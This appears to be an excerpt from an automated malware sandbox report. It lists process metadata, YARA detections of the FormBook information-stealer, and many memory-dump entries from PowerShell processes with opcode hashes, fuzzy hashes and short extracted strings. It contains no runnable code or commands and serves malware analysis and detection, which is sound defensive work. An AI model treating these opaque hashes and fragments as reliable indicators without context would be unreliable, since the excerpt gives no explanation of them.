                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:34
                                                            Start time:08:03:14
                                                            Start date:28/08/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff6bf500000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fced34851b31c3722e6ad33db3c94cff5c77dd720d789e10f6e81351ebc49ea
                                                              • Instruction ID: 868b7ed21d551e636ffba3040f7c7504a7c962642951effee0cf496f328c3444
                                                              • Opcode Fuzzy Hash: 2fced34851b31c3722e6ad33db3c94cff5c77dd720d789e10f6e81351ebc49ea
                                                              • Instruction Fuzzy Hash: 14F1C630A0DA4D8FEBA8DF28C8557E937D1FF54310F44426EE85DC72A5DB34AA458B81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 134240445d804fd646b6240d11eb644663963955be5246133658cd8118978e39
                                                              • Instruction ID: e26a369aac2d01283213b33ed937306d59fa3851f5862c7534b1d3f25b824f94
                                                              • Opcode Fuzzy Hash: 134240445d804fd646b6240d11eb644663963955be5246133658cd8118978e39
                                                              • Instruction Fuzzy Hash: B0F1C430A0DA4D8FEBA8DF28C8657E977D1EF54310F14436ED84DC72A5DE74A9418B82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1da2c2f024274c58f85fda8feb93d89783648816282ea01624b857ad534fdcf2
                                                              • Instruction ID: 08060912534e7d08e78f535f9069c4d779fbc4edeedd5bda42eb9b5fa4c80c2e
                                                              • Opcode Fuzzy Hash: 1da2c2f024274c58f85fda8feb93d89783648816282ea01624b857ad534fdcf2
                                                              • Instruction Fuzzy Hash: 54A1657171DB8A4FE759EB2C88A1AB577E1EF95310B0502BFD0C9C71B7DA25A842C341
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfe4f1a2ab496e64d3a7342919126e0e60520dd416323c43e11e73d859621ef4
                                                              • Instruction ID: 7bf6e6ba43a56268e181830a21f4c4811395612e7eeb71a93db628af21fb0a7e
                                                              • Opcode Fuzzy Hash: dfe4f1a2ab496e64d3a7342919126e0e60520dd416323c43e11e73d859621ef4
                                                              • Instruction Fuzzy Hash: D6E12A32B0FB8E0FEBA5DB5884756A477E1EF95354B0903BED05DC71F2DA18A8098341
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 155fb3352036f3b1e897641789a0e184be7d1b3028dfead2f89fee6fb02ab8c6
                                                              • Instruction ID: f248af03799f26ab9557897c79e22793588718398908ffdfe5e21f3217b4e6a9
                                                              • Opcode Fuzzy Hash: 155fb3352036f3b1e897641789a0e184be7d1b3028dfead2f89fee6fb02ab8c6
                                                              • Instruction Fuzzy Hash: 6FB10722B0EB8E0FEBA59B6C48A45B47BD1EF95290B4903BBD05DC71F3ED14AD098341
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e22fa1326bcc6db451a6de6ec2e06ff62be9f214cea50e9f4870185ca8bf5b45
                                                              • Instruction ID: 5754c41286a7a3ecbe9d11029b323696230b4b470279e8bc3454a72ddcdf05ae
                                                              • Opcode Fuzzy Hash: e22fa1326bcc6db451a6de6ec2e06ff62be9f214cea50e9f4870185ca8bf5b45
                                                              • Instruction Fuzzy Hash: E9B1B430609B4D4FEB68DF28C8557E93BE1EF55310F04426EE49DC72A6CE74A9458B82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 607b5c9f6bbf1ce0a13bcbe1ea09cb3df7c5fec9936ade90f201a8eae4862020
                                                              • Instruction ID: 7d9244838da66232a498304d3aa0bcdbdb0d5c9f40533afa45339da40be92108
                                                              • Opcode Fuzzy Hash: 607b5c9f6bbf1ce0a13bcbe1ea09cb3df7c5fec9936ade90f201a8eae4862020
                                                              • Instruction Fuzzy Hash: A651A322B0FBCA0FE7A59758887567876E1AF95394B9A03BED05DC71F2DD18AC488301
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2499594076.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b7d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08b9be229eb904c14e77a3769578fa6a4cc72b74c8a0e62ca371d1303183a3da
                                                              • Instruction ID: 66161743d83f2341774c1ea1ad4efe84f21cf91ce4bc742e4cd16bd582a6701e
                                                              • Opcode Fuzzy Hash: 08b9be229eb904c14e77a3769578fa6a4cc72b74c8a0e62ca371d1303183a3da
                                                              • Instruction Fuzzy Hash: 13310522F0FB9B0BE7B5969818751B876C1EF90290B8D03BAE45DD71F2ED086D084342
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad2e2394600be2637a752cd0afdfb6f9a1ecee68706641df4ed3bd38f346619c
                                                              • Instruction ID: 94690addc8558ab847222b3c477a161acefdadabb67a404fcf38c9c96f3af8c8
                                                              • Opcode Fuzzy Hash: ad2e2394600be2637a752cd0afdfb6f9a1ecee68706641df4ed3bd38f346619c
                                                              • Instruction Fuzzy Hash: E831EE30A1A64E8EFBB89F54CC66BF53294FF45319F41023AD44E862B2CA386B45CB51
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                              • Instruction ID: 5bcb71ee52f823b82f3ba7486285d421ab14aba17b48ecd7b7618d5a97259e52
                                                              • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                              • Instruction Fuzzy Hash: B101843020CB0C4FD748EF4CE051AA5B3E0FB95324F10056EE58AC36A5D622E882CB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2496951988.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1[_H
                                                              • API String ID: 0-1277036976
                                                              • Opcode ID: 477d1c84d53431ad8d66eedaa5dc7980be5089238af9d9dde1dacbceb25c1b5c
                                                              • Instruction ID: 2c7b8ffcdca01fcea9c3615e0d33acefa389b8255dab8f85960d12f9683b2b4d
                                                              • Opcode Fuzzy Hash: 477d1c84d53431ad8d66eedaa5dc7980be5089238af9d9dde1dacbceb25c1b5c
                                                              • Instruction Fuzzy Hash: 4A222672B0EB8E4FEB55DB5CC8B19E97BB0FF55310B0502B7D089C71A2CE24A9428781
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k
                                                              • API String ID: 0-1335044990
                                                              • Opcode ID: 5f762f652f32430e8d4ae65a4296e79204f86e55c7aae8ce0cdd9b1142f76e55
                                                              • Instruction ID: d00a51ced0e97591f09043933de6aabe86c332c03ad6f38affe134cee1d73818
                                                              • Opcode Fuzzy Hash: 5f762f652f32430e8d4ae65a4296e79204f86e55c7aae8ce0cdd9b1142f76e55
                                                              • Instruction Fuzzy Hash: E0B17C70E002098FDF18DFA8C89579EBBF2AF88314F14862DD855A7394FB74A845CB81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 264a8d42c3500102891472da7614643e8e7f337580d874b6aeca3485cc5127a9
                                                              • Instruction ID: e515ee598c18e5f2783dfa3d2296695e287d65048579d3d17875b849c170028e
                                                              • Opcode Fuzzy Hash: 264a8d42c3500102891472da7614643e8e7f337580d874b6aeca3485cc5127a9
                                                              • Instruction Fuzzy Hash: 07B16B70E002099FDF18DFA9D99179DBBF2AF88314F14862DD815A7394FB74A885CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-745898724
                                                              • Opcode ID: b7228dcd9822b3c13c0783d1ca034900690285f7312d6edd207f391b9ac23c8c
                                                              • Instruction ID: b42dc7024b2977965943b143f534b75192c99f67f476bb7912eb7e67398203a2
                                                              • Opcode Fuzzy Hash: b7228dcd9822b3c13c0783d1ca034900690285f7312d6edd207f391b9ac23c8c
                                                              • Instruction Fuzzy Hash: D7F114B1704386DFCB258E68C8416EBBBB1EF86211F24C4ABD845CB391DB31D946D7A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-4287419856
                                                              • Opcode ID: c6cbb9051ffaaa8babe6fd6a028621d70922991eb50104167b04df5ae35a41a4
                                                              • Instruction ID: 6ad9395e4bb8b6f0ea6d17f3342c22036e348a9627ebf936c8b6b3ad8f641d29
                                                              • Opcode Fuzzy Hash: c6cbb9051ffaaa8babe6fd6a028621d70922991eb50104167b04df5ae35a41a4
                                                              • Instruction Fuzzy Hash: 2CF159F07042169FCB218A7984192FBBBEAAFC5211F54C87BD905CB341DB31D946C7A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-608414060
                                                              • Opcode ID: 1604276e0b620a0f570f96668eb683d0038569d762379d8809adccd6db53507f
                                                              • Instruction ID: 52cf300312daffc535a19ae1cef48bf3f20c83350cf136819e6d56149b87bc8f
                                                              • Opcode Fuzzy Hash: 1604276e0b620a0f570f96668eb683d0038569d762379d8809adccd6db53507f
                                                              • Instruction Fuzzy Hash: 5DE1D1B1B002199FCB249A69C8416EBBBB2FFC5311F14C46BDA199B341DB31D946CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.uk$-uk
                                                              • API String ID: 0-3427641133
                                                              • Opcode ID: 75c60e1eee390790d6255aca26d91727e8e878f76454d44e7760860ef17b1612
                                                              • Instruction ID: 2b7ca1eda2de24fe882fd61d57033ea22d7143b5f2c5a0127059a6088f585980
                                                              • Opcode Fuzzy Hash: 75c60e1eee390790d6255aca26d91727e8e878f76454d44e7760860ef17b1612
                                                              • Instruction Fuzzy Hash: 5042A2B4A00215DFDB24DB58C951BEEBBF2AF85301F51C89AD909AF744CB31AC46CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$x.uk$-uk
                                                              • API String ID: 0-3427641133
                                                              • Opcode ID: cacfd2ed36b92cfbc009ccb7894a1956e72f682a46f51fafca74970f7f6311cb
                                                              • Instruction ID: f3d63ad6e17f8503dc6ee5a08ba9c13b4d55ce50ae11feb8ef445c1fcbade5cc
                                                              • Opcode Fuzzy Hash: cacfd2ed36b92cfbc009ccb7894a1956e72f682a46f51fafca74970f7f6311cb
                                                              • Instruction Fuzzy Hash: 8FD19EB0A002099FC715DB68C551BEEBBE3AB88305F61C82AD9056F795CF31EC46CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-2783870779
                                                              • Opcode ID: 7f2604beb047a4408a80d372cfd1bb8092e71c9c6a6fef9286accfe03e08e9d9
                                                              • Instruction ID: 927bd9176c08f0239fa4bcc7e8f9c1628c248563c0d56f3cb63f3f7aaaf3ddc7
                                                              • Opcode Fuzzy Hash: 7f2604beb047a4408a80d372cfd1bb8092e71c9c6a6fef9286accfe03e08e9d9
                                                              • Instruction Fuzzy Hash: D1F148B170631A9FC7258B6898416FBBBA2EFC5311F14C46BD805CB361DB31D946C7A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$x.uk$x.uk$-uk
                                                              • API String ID: 0-2224374688
                                                              • Opcode ID: 7f6aae16d2debe9e5deb071e9c5e6605bf02a319a0e9f0d8913d10651791b798
                                                              • Instruction ID: 06708e8fe7305bb3a2411774c31020277169e8745430212b53a6f65fd1123d1b
                                                              • Opcode Fuzzy Hash: 7f6aae16d2debe9e5deb071e9c5e6605bf02a319a0e9f0d8913d10651791b798
                                                              • Instruction Fuzzy Hash: 63F1A1B0A002159FDB24DF58C951BAE7BF3AF84305F51C89AE9096F781CB35AC85CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$x.uk$-uk
                                                              • API String ID: 0-241069083
                                                              • Opcode ID: 928215932646c4d056c770bd135b2420ef87fce8ff274a25373c76966f5962f4
                                                              • Instruction ID: ff5029be54ee3045004508eefc9e3212322a60f4aff83d402e55987b58066feb
                                                              • Opcode Fuzzy Hash: 928215932646c4d056c770bd135b2420ef87fce8ff274a25373c76966f5962f4
                                                              • Instruction Fuzzy Hash: FCA18EB0A00205DFD725CF68C541BEEBBB2AF88315F55C81AE9056F795CB31AC46CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-2296240322
                                                              • Opcode ID: 88e92ed55cd4e1ecfb9a5309be31594f6ab3330399aca57cf9da5975cb33f785
                                                              • Instruction ID: 94f7b564f04e12bfff1f7750b4b9a86009286aa26572e87149cdb5fb0981c281
                                                              • Opcode Fuzzy Hash: 88e92ed55cd4e1ecfb9a5309be31594f6ab3330399aca57cf9da5975cb33f785
                                                              • Instruction Fuzzy Hash: A91235B17042168FCB258E6C89017EF7BA2AFC2311F54C8ABD905DB791DB32D946C7A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq
                                                              • API String ID: 0-3750620159
                                                              • Opcode ID: e50aa1e3f38396e093a508466267db3baa11da318908a37fb67f48cc84a099da
                                                              • Instruction ID: 64747748269f5e3f8da56d104905f853e2247ed2995cd8b15d0593280b6e8c5a
                                                              • Opcode Fuzzy Hash: e50aa1e3f38396e093a508466267db3baa11da318908a37fb67f48cc84a099da
                                                              • Instruction Fuzzy Hash: FF9128F07043169FCB258A7989197FB7BE6AFC6201F14886BD905CF391DA31D846C7A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k$\V(k
                                                              • API String ID: 0-634497353
                                                              • Opcode ID: fb663581695815079d8fb248e8b3f7c625ae62d7e8391fba1d418a74e27db0c1
                                                              • Instruction ID: 31c4e4a5b14990d9d6852896650c1d5f7ece58e21386b72488f8c5688ec9d0b2
                                                              • Opcode Fuzzy Hash: fb663581695815079d8fb248e8b3f7c625ae62d7e8391fba1d418a74e27db0c1
                                                              • Instruction Fuzzy Hash: 57717E70E002099FEB18DFA9D8807DEBBF1AF48714F14862DD415A7254EB74A886CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k$\V(k
                                                              • API String ID: 0-634497353
                                                              • Opcode ID: 570424a3e1fb428f41c88955134a6aba600a5fd88a3bdc10eda1e5191e950859
                                                              • Instruction ID: ce8eec74b7fb973775290bda8867ab30623aa2cf4de514efbd4640f71d04b17c
                                                              • Opcode Fuzzy Hash: 570424a3e1fb428f41c88955134a6aba600a5fd88a3bdc10eda1e5191e950859
                                                              • Instruction Fuzzy Hash: E5716F71E002099FEF18DFA9D8847DEBBF2AF48714F14862DD415A7354EB74A842CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h](k$I(k
                                                              • API String ID: 0-550193744
                                                              • Opcode ID: 66074a45b3a875ed34012b32dcf2e4e8c4c03c7473c69c3dfa6ba5a75a93c8a0
                                                              • Instruction ID: 033dad66336adb7d0e73def78fc7a2026260ba93b1fe4126df52769c5b177976
                                                              • Opcode Fuzzy Hash: 66074a45b3a875ed34012b32dcf2e4e8c4c03c7473c69c3dfa6ba5a75a93c8a0
                                                              • Instruction Fuzzy Hash: B4311C30B052188BCF2AAB34C8556AEB7F6AF89304F0405EDD50AAB351DF359E85CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $dq$$dq
                                                              • API String ID: 0-2340669324
                                                              • Opcode ID: 7f91aeb7972cf05936b692d2915435c252a6455430c13c849669f17f5202694d
                                                              • Instruction ID: 7d4205aaaef0365852df1ee8f2796ddd0fd7a04e4a135dde927c94a84a8a2c79
                                                              • Opcode Fuzzy Hash: 7f91aeb7972cf05936b692d2915435c252a6455430c13c849669f17f5202694d
                                                              • Instruction Fuzzy Hash: B51184B520A3879FD7228A24D8509E3BF75AF92210F2981ABD844CF2B3D631DD45C771
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2197253404.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_4680000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V(k
                                                              • API String ID: 0-1335044990
                                                              • Opcode ID: 6be33d138a19295f42af639bcc5371933fcdeddf9de4974b65714b5c771cab00
                                                              • Instruction ID: 6f33eb276ccfa72d0015818a1071e6da208636ffde9682a4d325bbe606b026ad
                                                              • Opcode Fuzzy Hash: 6be33d138a19295f42af639bcc5371933fcdeddf9de4974b65714b5c771cab00
                                                              • Instruction Fuzzy Hash: 78B18C70E002098FDB18DFA8D8957DDBBF2AF88314F14862DE855A7394EB74A845CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.uk
                                                              • API String ID: 0-892602854
                                                              • Opcode ID: 3dca31cab6eb2a68497f0e1780e1b59549fc01f083fb8e7fe87a8e900944e83e
                                                              • Instruction ID: 1a6ed4fcca3439640848dc43d6430227d257175575af05a8cbb137d133990a40
                                                              • Opcode Fuzzy Hash: 3dca31cab6eb2a68497f0e1780e1b59549fc01f083fb8e7fe87a8e900944e83e
                                                              • Instruction Fuzzy Hash: F09190B0B002049FD714DB58C655BEEBBE6AF89301F50C86AE9056F781CB32EC91CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x.uk
                                                              • API String ID: 0-892602854
                                                              • Opcode ID: 05080908cb13d438163fde94e3356186f7862bd2021006b7d3e0ece7014ee6bf
                                                              • Instruction ID: 89ce186d696050856f1ee45358d3b11846239dec9efc74124ed41fa10030e2a4
                                                              • Opcode Fuzzy Hash: 05080908cb13d438163fde94e3356186f7862bd2021006b7d3e0ece7014ee6bf
                                                              • Instruction Fuzzy Hash: CB91B0B4A00204AFD714DB54C650BEEBBF6AF89305F50C46AE505AF791CB32AC96CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq
                                                              • API String ID: 0-2402691438
                                                              • Opcode ID: ed64ce27dddf1e9f673fac98b86e76741d4fa2b3b887c7b11adb0f83ed55f6f0
                                                              • Instruction ID: 8d22aca163dec2dcd373fa7874ad4314013a02d71f3455b247b679348343ea6f
                                                              • Opcode Fuzzy Hash: ed64ce27dddf1e9f673fac98b86e76741d4fa2b3b887c7b11adb0f83ed55f6f0
                                                              • Instruction Fuzzy Hash: EA61D2B46093D19FC7228F2488146E6BFB1AF86215B6AC4DBD4448F392C736DC46D7A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2205257136.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_8280000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PHdq
                                                              • API String ID: 0-2991842255
                                                              • Opcode ID: f01b979dfbaca8424f47a643da5367941f2508d5ee9d40802d5e7962b6e12c93
                                                              • Instruction ID: 3e39c3405d216e231a7a479254a8aabc88f8e1481b83f0319ee4f8160d70324a
                                                              • Opcode Fuzzy Hash: f01b979dfbaca8424f47a643da5367941f2508d5ee9d40802d5e7962b6e12c93
                                                              • Instruction Fuzzy Hash: C6719C70A2124ACFDF14EFE8C9547AEBBB2AF85305F204419D406AF394DB74AC89CB45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2203594251.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7470000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq
                                                              • API String ID: 0-1167855494
                                                              • Opcode ID: ca5469ff9fe0a4648cbe18c20d559017dfbc0b130e9f49f234c94e4f8c5cdb96
